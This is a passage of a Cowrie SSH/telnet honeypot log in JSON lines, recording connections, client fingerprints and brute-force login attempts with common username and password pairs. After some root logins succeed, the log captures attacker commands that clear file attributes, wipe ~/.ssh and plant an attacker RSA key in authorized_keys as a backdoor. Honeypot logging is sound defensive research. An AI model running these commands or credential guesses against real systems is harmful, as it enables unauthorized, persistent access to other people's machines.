xt-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:33:36.958233Z","src_ip":"212.227.235.229","session":"9d8e5347d8ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33441,"dst_ip":"1.2.3.4","dst_port":23,"session":"e8943711d720","protocol":"telnet","message":"New connection: 212.227.235.229:33441 (1.2.3.4:23) [session: e8943711d720]","sensor":"my-vps","timestamp":"2025-09-08T13:33:36.987430Z"}
{"eventid":"cowrie.login.failed","username":"monitor","password":"monitor@123","message":"login attempt [monitor/monitor@123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:33:37.485655Z","src_ip":"212.227.235.229","session":"9d8e5347d8ed"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:38.609129Z","src_ip":"212.227.235.229","session":"9d8e5347d8ed"}
{"eventid":"cowrie.session.closed","duration":12.765090703964233,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:44.760313Z","src_ip":"212.227.125.160","session":"2015d46d74dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23251,"dst_ip":"1.2.3.4","dst_port":23,"session":"24a9c95ae2a2","protocol":"telnet","message":"New connection: 212.227.125.160:23251 (1.2.3.4:23) [session: 24a9c95ae2a2]","sensor":"my-vps","timestamp":"2025-09-08T13:33:44.971418Z"}
{"eventid":"cowrie.session.closed","duration":12.635728120803833,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:47.694540Z","src_ip":"212.227.235.229","session":"424c67602cc3"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":58388,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2447c6a2471","protocol":"ssh","message":"New connection: 134.199.174.250:58388 (1.2.3.4:22) [session: a2447c6a2471]","sensor":"my-vps","timestamp":"2025-09-08T13:33:48.332462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:33:48.392222Z","src_ip":"134.199.174.250","session":"a2447c6a2471"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:33:48.659801Z","src_ip":"134.199.174.250","session":"a2447c6a2471"}
{"eventid":"cowrie.session.closed","duration":12.730569839477539,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:49.717934Z","src_ip":"212.227.235.229","session":"e8943711d720"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33756,"dst_ip":"1.2.3.4","dst_port":23,"session":"a6d235b1e557","protocol":"telnet","message":"New connection: 212.227.235.229:33756 (1.2.3.4:23) [session: a6d235b1e557]","sensor":"my-vps","timestamp":"2025-09-08T13:33:49.921265Z"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"1q2w3e4r","message":"login attempt [administrator/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:33:50.022108Z","src_ip":"134.199.174.250","session":"a2447c6a2471"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:51.360393Z","src_ip":"134.199.174.250","session":"a2447c6a2471"}
{"eventid":"cowrie.session.closed","duration":12.820170164108276,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:33:57.791523Z","src_ip":"212.227.125.160","session":"24a9c95ae2a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":24723,"dst_ip":"1.2.3.4","dst_port":23,"session":"f373b337fe9a","protocol":"telnet","message":"New connection: 212.227.125.160:24723 (1.2.3.4:23) [session: f373b337fe9a]","sensor":"my-vps","timestamp":"2025-09-08T13:33:58.021061Z"}
{"eventid":"cowrie.session.closed","duration":12.745821952819824,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:02.667010Z","src_ip":"212.227.235.229","session":"a6d235b1e557"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34071,"dst_ip":"1.2.3.4","dst_port":23,"session":"18a593f1d87f","protocol":"telnet","message":"New connection: 212.227.235.229:34071 (1.2.3.4:23) [session: 18a593f1d87f]","sensor":"my-vps","timestamp":"2025-09-08T13:34:02.936873Z"}
{"eventid":"cowrie.session.closed","duration":12.715550661087036,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:10.736501Z","src_ip":"212.227.125.160","session":"f373b337fe9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":18111,"dst_ip":"1.2.3.4","dst_port":23,"session":"a68e047fa17f","protocol":"telnet","message":"New connection: 212.227.125.160:18111 (1.2.3.4:23) [session: a68e047fa17f]","sensor":"my-vps","timestamp":"2025-09-08T13:34:10.942882Z"}
{"eventid":"cowrie.session.closed","duration":12.74183702468872,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:15.678641Z","src_ip":"212.227.235.229","session":"18a593f1d87f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34391,"dst_ip":"1.2.3.4","dst_port":23,"session":"68962bd2917c","protocol":"telnet","message":"New connection: 212.227.235.229:34391 (1.2.3.4:23) [session: 68962bd2917c]","sensor":"my-vps","timestamp":"2025-09-08T13:34:15.899829Z"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":43198,"dst_ip":"1.2.3.4","dst_port":22,"session":"7021a63d17c3","protocol":"ssh","message":"New connection: 134.199.174.250:43198 (1.2.3.4:22) [session: 7021a63d17c3]","sensor":"my-vps","timestamp":"2025-09-08T13:34:17.055852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:34:17.195857Z","src_ip":"134.199.174.250","session":"7021a63d17c3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:34:17.376962Z","src_ip":"134.199.174.250","session":"7021a63d17c3"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"pass123","message":"login attempt [administrator/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:34:18.684530Z","src_ip":"134.199.174.250","session":"7021a63d17c3"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:19.998359Z","src_ip":"134.199.174.250","session":"7021a63d17c3"}
{"eventid":"cowrie.session.closed","duration":13.068960905075073,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:24.011775Z","src_ip":"212.227.125.160","session":"a68e047fa17f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":19601,"dst_ip":"1.2.3.4","dst_port":23,"session":"ce1f0f338c53","protocol":"telnet","message":"New connection: 212.227.125.160:19601 (1.2.3.4:23) [session: ce1f0f338c53]","sensor":"my-vps","timestamp":"2025-09-08T13:34:24.225889Z"}
{"eventid":"cowrie.session.closed","duration":12.800304174423218,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:28.700067Z","src_ip":"212.227.235.229","session":"68962bd2917c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34704,"dst_ip":"1.2.3.4","dst_port":23,"session":"5d62518d139e","protocol":"telnet","message":"New connection: 212.227.235.229:34704 (1.2.3.4:23) [session: 5d62518d139e]","sensor":"my-vps","timestamp":"2025-09-08T13:34:28.973301Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38212,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1e53de12f6e","protocol":"ssh","message":"New connection: 212.227.235.229:38212 (1.2.3.4:22) [session: b1e53de12f6e]","sensor":"my-vps","timestamp":"2025-09-08T13:34:31.364037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:34:31.364890Z","src_ip":"212.227.235.229","session":"b1e53de12f6e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:34:31.477033Z","src_ip":"212.227.235.229","session":"b1e53de12f6e"}
{"eventid":"cowrie.login.success","username":"root","password":"starwars","message":"login attempt [root/starwars] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:34:31.957368Z","src_ip":"212.227.235.229","session":"b1e53de12f6e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:34:32.287910Z","src_ip":"212.227.235.229","session":"b1e53de12f6e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:34:32.288596Z","src_ip":"212.227.235.229","session":"b1e53de12f6e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:34:32.289637Z","src_ip":"212.227.235.229","session":"b1e53de12f6e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:32.453441Z","src_ip":"212.227.235.229","session":"b1e53de12f6e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:34:32.808253Z","src_ip":"212.227.235.229","session":"b1e53de12f6e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:34:32.808940Z","src_ip":"212.227.235.229","session":"b1e53de12f6e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:34:32.955283Z","src_ip":"212.227.235.229","session":"b1e53de12f6e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:32.956185Z","src_ip":"212.227.235.229","session":"b1e53de12f6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59240,"dst_ip":"1.2.3.4","dst_port":22,"session":"b19a9f06f4f5","protocol":"ssh","message":"New connection: 212.227.235.229:59240 (1.2.3.4:22) [session: b19a9f06f4f5]","sensor":"my-vps","timestamp":"2025-09-08T13:34:33.085411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:34:33.090862Z","src_ip":"212.227.235.229","session":"b19a9f06f4f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:34:33.314360Z","src_ip":"212.227.235.229","session":"b19a9f06f4f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38218,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bb9039f61a9","protocol":"ssh","message":"New connection: 212.227.235.229:38218 (1.2.3.4:22) [session: 1bb9039f61a9]","sensor":"my-vps","timestamp":"2025-09-08T13:34:34.127987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:34:34.128850Z","src_ip":"212.227.235.229","session":"1bb9039f61a9"}
{"eventid":"cowrie.login.success","username":"root","password":"123qwe.com","message":"login attempt [root/123qwe.com] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:34:34.219099Z","src_ip":"212.227.235.229","session":"b19a9f06f4f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:34:34.237977Z","src_ip":"212.227.235.229","session":"1bb9039f61a9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:34:34.721736Z","src_ip":"212.227.235.229","session":"b19a9f06f4f5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:34:34.722448Z","src_ip":"212.227.235.229","session":"b19a9f06f4f5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:34:34.723773Z","src_ip":"212.227.235.229","session":"b19a9f06f4f5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:34:34.725634Z","src_ip":"212.227.235.229","session":"1bb9039f61a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:34.948228Z","src_ip":"212.227.235.229","session":"b19a9f06f4f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:34:35.417722Z","src_ip":"212.227.235.229","session":"b19a9f06f4f5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:34:35.418483Z","src_ip":"212.227.235.229","session":"b19a9f06f4f5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:34:35.650871Z","src_ip":"212.227.235.229","session":"b19a9f06f4f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:35.651802Z","src_ip":"212.227.235.229","session":"b19a9f06f4f5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56446,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e4eb8f5fb94","protocol":"ssh","message":"New connection: 217.72.205.35:56446 (1.2.3.4:22) [session: 3e4eb8f5fb94]","sensor":"my-vps","timestamp":"2025-09-08T13:34:35.665625Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:35.666763Z","src_ip":"217.72.205.35","session":"3e4eb8f5fb94"}
